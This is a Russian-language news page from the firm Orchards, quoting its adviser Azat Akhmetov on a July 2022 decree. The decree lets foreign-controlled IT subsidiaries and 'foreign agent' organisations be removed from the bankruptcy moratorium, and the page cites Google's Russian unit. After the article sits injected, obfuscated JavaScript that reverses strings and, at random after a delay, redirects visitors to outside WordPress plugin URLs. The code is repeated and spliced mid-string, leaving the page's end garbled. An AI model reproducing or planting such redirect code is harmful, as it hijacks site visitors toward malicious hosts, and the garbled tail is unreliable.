«Дочки» иностранных IT-компаний по решению властей могут лишиться в РФ мораторной защиты от взысканий

Комментарий Азата Ахметова, советника Orchards, для Интерфакс.

Правительство РФ по мотивированной просьбе губернаторов или министров сможет выводить из-под действующего с 1 апреля по 1 октября 2022 года моратория на банкротства работающие в российском сегменте интернета компании, учрежденные и находящиеся под контролем иностранных лиц, а также признанные иноагентами некоммерческие организации, СМИ и аффилированные с ними лица. Это позволит не только банкротить такие структуры, но и взыскивать с них в рамках исполнительного производства наложенные ранее штрафы. Соответствующая норма утверждена постановлением «О внесении изменений в постановление правительства РФ от 28 марта 2022 г. №497», подписанным 13 июля. Принятое постановление наделило правительство правом вести перечень лиц, на которых мораторий не распространяется.

Этот перечень можно будет корректировать, включая в него новых должников, обращает внимание советник Orchards Азат Ахметов.

Новые правила могут затронуть российские структуры иностранных IT-гигантов, которые сейчас защищены мораторием от принудительных взысканий долгов и штрафов, возникших до 1 апреля 2022 года. Тем не менее, в мае 2022 года приставы возбудили в отношении ООО «Гугл» исполнительное производство о взыскании штрафа за неоднократный отказ удалить запрещенный контент в 7,2 млрд рублей и 505 млн рублей исполнительского сбора. В конце мая после того, как российская структура Google заявила о намерении инициировать собственное банкротство (что не выводит ее из-под защиты моратория на внешние банкротства), долг был погашен.

Постановление не будет иметь обратной силы, так как в нем отсутствует указание на это, указывает Азат Ахметов. Поэтому ретроспективно действие мораторной защиты не отменяется: «Кредиторы в случае включения должника в упомянутый перечень правительства и соответственно прекращения действия моратория в отношении него смогут вновь обратиться с заявлением о признании должника банкротом».

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews%2Fsearch%3Ftext%3D»>Ссылка на статью >>

Предыдущая новостьСледующая новость

Подпишитесь на Telegram Orchards

X